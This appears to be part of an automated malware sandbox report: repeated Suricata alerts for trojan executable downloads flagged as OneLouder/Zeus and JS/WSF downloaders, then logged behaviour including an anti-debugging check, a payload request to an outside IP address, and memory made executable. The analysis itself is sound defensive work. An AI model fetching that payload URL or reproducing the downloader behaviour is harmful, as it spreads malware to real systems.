TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
suspicious_features: Connection to IP address
suspicious_request: GET http://143.92.58.180:8000/1
request: GET http://143.92.58.180:8000/1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x744dd000
